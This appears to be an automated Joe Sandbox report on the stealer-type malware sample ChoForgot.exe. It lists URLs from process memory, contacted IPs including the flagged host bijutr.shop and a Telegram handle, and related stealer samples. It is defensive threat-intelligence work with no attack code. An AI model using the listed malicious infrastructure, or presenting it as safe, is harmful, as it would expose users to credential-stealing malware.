00000011.00000003.2563598629.000047E400E34000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://docs.google.com/document/d/1z2sdBwnUF2tSlhl3R2iUlk7gvmSbuLVXOgriPIcJkXQ/previewchrome.exe, 00000011.00000003.2591814642.000047E401528000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2591877343.000047E40153C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2591948572.000047E401540000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          https://cdn.ecosia.org/assets/images/ico/favicon.icochrome.exe, 00000011.00000002.2642382450.000047E400C0C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Wb.com, 0000000C.00000002.3032389782.0000000004885000.00000004.00000800.00020000.00000000.sdmp, Wb.com, 0000000C.00000002.3031181433.00000000045E3000.00000004.00000800.00020000.00000000.sdmp, IMGV3W.12.dr, Web Data.22.dr, MO8G47.12.drfalse
                                                                                                                                              		high
                                                                                                                                              https://t.me/k04aelm0nk3Mozilla/5.0Wb.com, 0000000C.00000003.2355096916.0000000001C94000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                http://www.autoitscript.com/autoit3/XWb.com, 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp, Wb.com.2.dr, Ensures.9.drfalse
                                                                                                                                                  		high
                                                                                                                                                  https://chrome.google.com/webstore?hl=en3chrome.exe, 00000011.00000002.2644398640.000047E4010C0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    https://issuetracker.google.com/161903006chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      https://www.ecosia.org/newtab/Wb.com, 0000000C.00000002.3031181433.00000000045E3000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2642271555.000047E400BBC000.00000004.00000800.00020000.00000000.sdmp, MO8G47.12.drfalse
                                                                                                                                                        		high
                                                                                                                                                        https://drive-daily-1.corp.google.com/chrome.exe, 00000011.00000003.2553573276.000047E4004B0000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.22.drfalse
                                                                                                                                                          		high
                                                                                                                                                          https://drive-daily-5.corp.google.com/chrome.exe, 00000011.00000003.2553573276.000047E4004B0000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.22.drfalse
                                                                                                                                                            		high
                                                                                                                                                            https://duckduckgo.com/favicon.icochrome.exe, 00000011.00000002.2642409748.000047E400C1C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              https://docs.google.com/spreadsheets/u/0/create?usp=chrome_actionschrome.exe, 00000011.00000002.2644300769.000047E400FF0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2639529411.000047E40050C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2640660218.000047E40078C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                https://myaccount.google.com/data-and-privacy?utm_source=ga-chrome-actions&utm_medium=managePrivacychrome.exe, 00000011.00000002.2644178608.000047E400F68000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2640691773.000047E4007A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2639276736.000047E4004C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  https://permanently-removed.invalid/chrome/blank.htmlmsedge.exe, 00000014.00000003.2700592502.00005B8002464000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2700730195.00005B800246C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2700974412.00005B8002470000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    http://anglebug.com/3078chrome.exe, 00000011.00000002.2640930970.000047E40081C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559150595.000047E400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      		high
                                                                                                                                                                      http://anglebug.com/7553chrome.exe, 00000011.00000002.2642467846.000047E400C48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559150595.000047E400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2701244390.00005B800257C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        		high
                                                                                                                                                                        http://anglebug.com/5375chrome.exe, 00000011.00000002.2640930970.000047E40081C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559150595.000047E400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          		high
                                                                                                                                                                          https://bzib.nelreports.net/api/report?cat=bingbusinessReporting and NEL.23.drfalse
                                                                                                                                                                            		high
                                                                                                                                                                            https://permanently-removed.invalid/v1/issuetokenmsedge.exe, 00000014.00000003.2700592502.00005B8002464000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2700730195.00005B800246C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2700974412.00005B8002470000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                              		high
                                                                                                                                                                              https://ogs.googchrome.exe, 00000011.00000002.2637677215.000047E4000FC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                		high
                                                                                                                                                                                http://anglebug.com/5371chrome.exe, 00000011.00000002.2642467846.000047E400C48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559150595.000047E400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2701244390.00005B800257C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  http://anglebug.com/4722chrome.exe, 00000011.00000003.2559150595.000047E400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2640537830.000047E400740000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    https://m.google.com/devicemanagement/data/apichrome.exe, 00000011.00000003.2552340537.000047E4001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2638276092.000047E4001C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                      		high
                                                                                                                                                                                      https://permanently-removed.invalid/reauth/v1beta/users/msedge.exe, 00000014.00000003.2700592502.00005B8002464000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2700730195.00005B800246C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2700974412.00005B8002470000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                        		high
                                                                                                                                                                                        https://www.google.com/chrome/tips/gspHchrome.exe, 00000011.00000002.2640506644.000047E40072C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                          		high
                                                                                                                                                                                          http://developer.chrome.com/extensions/external_extensions.html)chrome.exe, 00000011.00000002.2637619690.000047E4000EC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                            		high
                                                                                                                                                                                            https://docs.google.com/presentation/u/0/create?usp=chrome_actionschrome.exe, 00000011.00000002.2644300769.000047E400FF0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2639529411.000047E40050C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2640660218.000047E40078C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                              		high
                                                                                                                                                                                              http://anglebug.com/7556chrome.exe, 00000011.00000002.2642467846.000047E400C48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559150595.000047E400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2701244390.00005B800257C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                		high
                                                                                                                                                                                                https://chromewebstore.google.com/msedge.exe, 00000014.00000002.2776605861.00005B800237C000.00000004.00000800.00020000.00000000.sdmp, manifest.json.22.drfalse
                                                                                                                                                                                                  		high
                                                                                                                                                                                                  https://drive-preprod.corp.google.com/chrome.exe, 00000011.00000003.2553573276.000047E4004B0000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.22.drfalse
                                                                                                                                                                                                    		high
                                                                                                                                                                                                    http://anglebug.com/7279Qchrome.exe, 00000011.00000002.2641961362.000047E400AD0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                    		unknown
                                                                                                                                                                                                    https://clients4.google.com/chrome-syncchrome.exe, 00000011.00000002.2638276092.000047E4001C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      		high
                                                                                                                                                                                                      https://publickeyservice.pa.gcp.privacysandboxservices.comchrome.exe, 00000011.00000003.2589240103.000047E40140C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        		high
                                                                                                                                                                                                        https://permanently-removed.invalid/RotateBoundCookiesmsedge.exe, 00000014.00000003.2700592502.00005B8002464000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2700730195.00005B800246C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2700974412.00005B8002470000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          		high
                                                                                                                                                                                                          http://anglebug.com/6692chrome.exe, 00000011.00000002.2642467846.000047E400C48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559150595.000047E400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            		high
                                                                                                                                                                                                            https://issuetracker.google.com/258207403chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              		high
                                                                                                                                                                                                              http://anglebug.com/3502chrome.exe, 00000011.00000002.2640930970.000047E40081C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559150595.000047E400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                		high
                                                                                                                                                                                                                http://anglebug.com/3623chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  		high
                                                                                                                                                                                                                  http://anglebug.com/3625chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    		high
                                                                                                                                                                                                                    http://anglebug.com/3624chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      		high
                                                                                                                                                                                                                      https://docs.google.com/presentation/Jchrome.exe, 00000011.00000002.2640291471.000047E4006AB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        		high
                                                                                                                                                                                                                        https://bijutr.shop936ed13bd870Wb.com, 0000000C.00000002.3028437270.00000000004AD000.00000040.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                                                        		unknown
                                                                                                                                                                                                                        https://t.mWb.com, 0000000C.00000003.2354835954.0000000004585000.00000004.00000800.00020000.00000000.sdmp, Wb.com, 0000000C.00000003.2355039530.0000000004585000.00000004.00000800.00020000.00000000.sdmp, Wb.com, 0000000C.00000003.2354815842.00000000045B3000.00000004.00000800.00020000.00000000.sdmp, Wb.com, 0000000C.00000003.2354920999.0000000004509000.00000004.00000800.00020000.00000000.sdmp, Wb.com, 0000000C.00000003.2354749747.0000000001C70000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          		high
                                                                                                                                                                                                                          http://anglebug.com/5007chrome.exe, 00000011.00000003.2559150595.000047E400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2640417345.000047E4006EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            		high
                                                                                                                                                                                                                            https://drive.google.com/drive/installwebapp?usp=chrome_defaultchrome.exe, 00000011.00000002.2640291471.000047E4006AB000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2638868900.000047E400380000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              		high
                                                                                                                                                                                                                              http://anglebug.com/3862chrome.exe, 00000011.00000002.2642467846.000047E400C48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559150595.000047E400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2701244390.00005B800257C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                		high
                                                                                                                                                                                                                                https://chrome.google.com/webstoreLDDiscoverchrome.exe, 00000011.00000002.2642467846.000047E400C48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559467114.000047E400C7C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2564039810.000047E40033C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2556314289.000047E40033C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2560291355.000047E400C7C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2556474234.000047E400484000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2565321356.000047E400C7C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2558088225.000047E400D80000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                  		high
                                                                                                                                                                                                                                  https://www.ecosia.org/search?q=&addon=opensearchchrome.exe, 00000011.00000002.2642382450.000047E400C0C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                    		high
                                                                                                                                                                                                                                    https://google-ohttp-relay-join.fastly-edge.com/Vhchrome.exe, 00000011.00000003.2591689644.000047E4014E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2591630845.000047E4014E4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                      		high
                                                                                                                                                                                                                                      http://anglebug.com/4836chrome.exe, 00000011.00000002.2642467846.000047E400C48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559150595.000047E400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2701244390.00005B800257C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                        		high
                                                                                                                                                                                                                                        https://issuetracker.google.com/issues/166475273chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                          		high

                                                                                                                                                                                                                                          World Map of Contacted IPs

                                                                                                                                                                                                                                          • No. of IPs < 25%
                                                                                                                                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                          • 75% < No. of IPs

                                                                                                                                                                                                                                          Public IPs

                                                                                                                                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                          172.217.19.225
                                                                                                                                                                                                                                          		googlehosted.l.googleusercontent.comUnited States
                                                                                                                                                                                                                                          		15169GOOGLEUSfalse
                                                                                                                                                                                                                                          149.154.167.99
                                                                                                                                                                                                                                          		t.meUnited Kingdom
                                                                                                                                                                                                                                          		62041TELEGRAMRUfalse
                                                                                                                                                                                                                                          108.139.47.50
                                                                                                                                                                                                                                          		unknownUnited States
                                                                                                                                                                                                                                          		16509AMAZON-02USfalse
                                                                                                                                                                                                                                          162.159.61.3
                                                                                                                                                                                                                                          		unknownUnited States
                                                                                                                                                                                                                                          		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                          172.217.21.36
                                                                                                                                                                                                                                          		www.google.comUnited States
                                                                                                                                                                                                                                          		15169GOOGLEUSfalse
                                                                                                                                                                                                                                          20.110.205.119
                                                                                                                                                                                                                                          		unknownUnited States
                                                                                                                                                                                                                                          		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                          188.245.216.205
                                                                                                                                                                                                                                          		bijutr.shopIran (ISLAMIC Republic Of)
                                                                                                                                                                                                                                          		16322PARSONLINETehran-IRANIRtrue
                                                                                                                                                                                                                                          204.79.197.219
                                                                                                                                                                                                                                          		unknownUnited States
                                                                                                                                                                                                                                          		8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                          172.64.41.3
                                                                                                                                                                                                                                          		chrome.cloudflare-dns.comUnited States
                                                                                                                                                                                                                                          		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                          104.70.121.51
                                                                                                                                                                                                                                          		unknownUnited States
                                                                                                                                                                                                                                          		20940AKAMAI-ASN1EUfalse
                                                                                                                                                                                                                                          51.104.15.253
                                                                                                                                                                                                                                          		unknownUnited Kingdom
                                                                                                                                                                                                                                          		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                          3.160.188.50
                                                                                                                                                                                                                                          		sb.scorecardresearch.comUnited States
                                                                                                                                                                                                                                          		16509AMAZON-02USfalse
                                                                                                                                                                                                                                          23.219.82.25
                                                                                                                                                                                                                                          		unknownUnited States
                                                                                                                                                                                                                                          		20940AKAMAI-ASN1EUfalse
                                                                                                                                                                                                                                          239.255.255.250
                                                                                                                                                                                                                                          		unknownReserved
                                                                                                                                                                                                                                          		unknownunknownfalse

                                                                                                                                                                                                                                          Private

                                                                                                                                                                                                                                          IP
                                                                                                                                                                                                                                          192.168.2.6
                                                                                                                                                                                                                                          127.0.0.1

                                                                                                                                                                                                                                          General Information

                                                                                                                                                                                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                                          Analysis ID:1579962
                                                                                                                                                                                                                                          Start date and time:2024-12-23 17:13:07 +01:00
                                                                                                                                                                                                                                          Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                                          Overall analysis duration:0h 8m 25s
                                                                                                                                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                          Report type:full
                                                                                                                                                                                                                                          Cookbook file name:default.jbs
                                                                                                                                                                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                                          Number of analysed new started processes analysed:36
                                                                                                                                                                                                                                          Number of new started drivers analysed:0
                                                                                                                                                                                                                                          Number of existing processes analysed:0
                                                                                                                                                                                                                                          Number of existing drivers analysed:0
                                                                                                                                                                                                                                          Number of injected processes analysed:0
                                                                                                                                                                                                                                          Technologies:
                                                                                                                                                                                                                                          • HCA enabled
                                                                                                                                                                                                                                          • EGA enabled
                                                                                                                                                                                                                                          • AMSI enabled
                                                                                                                                                                                                                                          Analysis Mode:default
                                                                                                                                                                                                                                          Analysis stop reason:Timeout
                                                                                                                                                                                                                                          Sample name:ChoForgot.exe
                                                                                                                                                                                                                                          Detection:MAL
                                                                                                                                                                                                                                          Classification:mal100.troj.spyw.evad.winEXE@95/287@27/16
                                                                                                                                                                                                                                          EGA Information:
                                                                                                                                                                                                                                          • Successful, ratio: 100%
                                                                                                                                                                                                                                          HCA Information:
                                                                                                                                                                                                                                          • Successful, ratio: 100%
                                                                                                                                                                                                                                          • Number of executed functions: 79
                                                                                                                                                                                                                                          • Number of non-executed functions: 296
                                                                                                                                                                                                                                          Cookbook Comments:
                                                                                                                                                                                                                                          • Found application associated with file extension: .exe

                                                                                                                                                                                                                                          Warnings

                                                                                                                                                                                                                                          • Exclude process from analysis (whitelisted): dllhost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
                                                                                                                                                                                                                                          • Excluded IPs from analysis (whitelisted): 192.229.221.95, 199.232.210.172, 172.217.19.227, 172.217.19.238, 64.233.161.84, 172.217.17.46, 172.217.21.35, 172.217.19.234, 142.250.181.74, 142.250.181.10, 172.217.21.42, 172.217.17.42, 216.58.208.234, 172.217.19.202, 142.250.181.42, 172.217.17.74, 142.250.181.106, 142.250.181.138, 204.79.197.203, 13.107.42.16, 204.79.197.239, 13.107.21.239, 13.107.6.158, 13.87.96.169, 2.16.168.107, 2.16.168.113, 2.16.158.40, 2.16.158.51, 2.16.158.35, 2.16.158.74, 2.16.158.186, 2.16.158.192, 2.16.158.27, 2.16.158.43, 2.16.158.33, 2.16.158.176, 2.16.158.170, 2.16.158.80, 2.16.158.91, 2.16.158.90, 2.16.158.83, 2.16.158.179, 2.16.158.82, 2.16.158.169, 95.100.135.42, 95.100.135.32, 95.100.135.40, 95.100.135.33, 95.100.135.26, 95.100.135.25, 95.100.135.27, 95.100.135.35, 95.100.135.41, 2.16.168.122, 2.16.158.75, 13.74.129.1, 204.79.197.237, 13.107.21.237, 2.16.168.117, 2.16.168.118, 142.251.32.99, 142.251.35.163, 142.250.72.99, 142.250.80.35, 13.107.246.63, 4.175.87.197, 23.218.208.109,
                                                                                                                                                                                                                                          • Excluded domains from analysis (whitelisted): nav-edge.smartscreen.microsoft.com, slscr.update.microsoft.com, a416.dscd.akamai.net, img-s-msn-com.akamaized.net, data-edge.smartscreen.microsoft.com, clientservices.googleapis.com, clients2.google.com, e86303.dscx.akamaiedge.net, ocsp.digicert.com, config-edge-skype.l-0007.l-msedge.net, login.live.com, www.gstatic.com, l-0007.l-msedge.net, e28578.d.akamaiedge.net, www.bing.com, assets.msn.com.edgekey.net, fs.microsoft.com, bingadsedgeextension-prod.trafficmanager.net, c-bing-com.dual-a-0034.a-msedge.net, prod-atm-wds-edge.trafficmanager.net, deff.nelreports.net.akamaized.net, www-www.bing.com.trafficmanager.net, business-bing-com.b-0005.b-msedge.net, a1834.dscg2.akamai.net, c.bing.com, edgeassetservice.azureedge.net, clients.l.google.com, config.edge.skype.com.trafficmanager.net, c-msn-com-nsatc.trafficmanager.net, arc.msn.com, redirector.gvt1.com, www.bing.com.edgekey.net, th.bing.com, msedge.b.tlu.dl.delivery.mp.microsoft.com, a1858.dscd.akamai.net, config.edg
                                                                                                                                                                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                                                                          • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                                                                                                                          • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                                          • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                                          • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                                                                                          • Report size getting too big, too many NtWriteFile calls found.
                                                                                                                                                                                                                                          • Report size getting too big, too many NtWriteVirtualMemory calls found.
                                                                                                                                                                                                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                          • VT rate limit hit for: ChoForgot.exe

                                                                                                                                                                                                                                          Simulations

                                                                                                                                                                                                                                          Behavior and APIs

                                                                                                                                                                                                                                          TimeTypeDescription
                                                                                                                                                                                                                                          11:13:57API Interceptor1x Sleep call for process: ChoForgot.exe modified

                                                                                                                                                                                                                                          Joe Sandbox View / Context

                                                                                                                                                                                                                                          IPs

                                                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                          108.139.47.50QIo3SytSZA.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                            T0x859fNfn.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                              file.exeGet hashmaliciousPureCrypter, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                                                                  file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                                                                    https://nekofile.eu.org/f8e2cb54931bf39d6c12eo5ncGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                      http://www.sdmts.com/business-center/for-hire-vehicle-administration&c=E,1,pc5oom8YsW1RqHtANaUTLgMvd2z37r_4n-NR90jlF12Z7NyUKYXr1sKmCXY3dgMIENHwNl8jxylzX2garHrVx3wU2gE5fuDMBydZQ2COLEQJ&typo=1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                        https://blyocelectric.com/4xmaf95qR5m4wJYw4Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                          https://xfv.pages.dev/robots.txtGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                            https://jfb.pages.dev/account/js-reporting/?crumb=uZ4.07kERLI&message=javascript_not_enabled&ref=%2Faccount%2Fchallenge%2FpasswordGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                              162.159.61.3gVKsiQIHqe.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                trZG6pItZj.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                  Loader.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                    SWIFT.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                      Ocean-T2I4I8O9.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                        ktyihkdfesf.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                          pjthjsdjgjrtavv.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                            QhR8Zp6fZs.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                              CNUXJvLcgw.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                pM3fQBuTLy.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                                  149.154.167.99http://xn--r1a.website/s/ogorodruGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                  • telegram.org/img/favicon.ico
                                                                                                                                                                                                                                                                                  http://cryptorabotakzz.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                  • telegram.org/
                                                                                                                                                                                                                                                                                  http://cache.netflix.com.id1.wuush.us.kg/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                  • telegram.org/dl?tme=fe3233c08ff79d4814_5062105595184761217
                                                                                                                                                                                                                                                                                  http://investors.spotify.com.sg2.wuush.us.kg/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                  • telegram.org/
                                                                                                                                                                                                                                                                                  http://bekaaviator.kz/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                  • telegram.org/
                                                                                                                                                                                                                                                                                  http://telegramtw1.org/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                  • telegram.org/?setln=pl
                                                                                                                                                                                                                                                                                  http://makkko.kz/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                  • telegram.org/
                                                                                                                                                                                                                                                                                  http://telegram.dogGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                  • telegram.dog/
                                                                                                                                                                                                                                                                                  LnSNtO8JIa.exeGet hashmaliciousCinoshi StealerBrowse
                                                                                                                                                                                                                                                                                  • t.me/cinoshibot
                                                                                                                                                                                                                                                                                  jtfCFDmLdX.exeGet hashmaliciousGurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRATBrowse
                                                                                                                                                                                                                                                                                  • t.me/cinoshibot

                                                                                                                                                                                                                                                                                  Domains

                                                                                                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
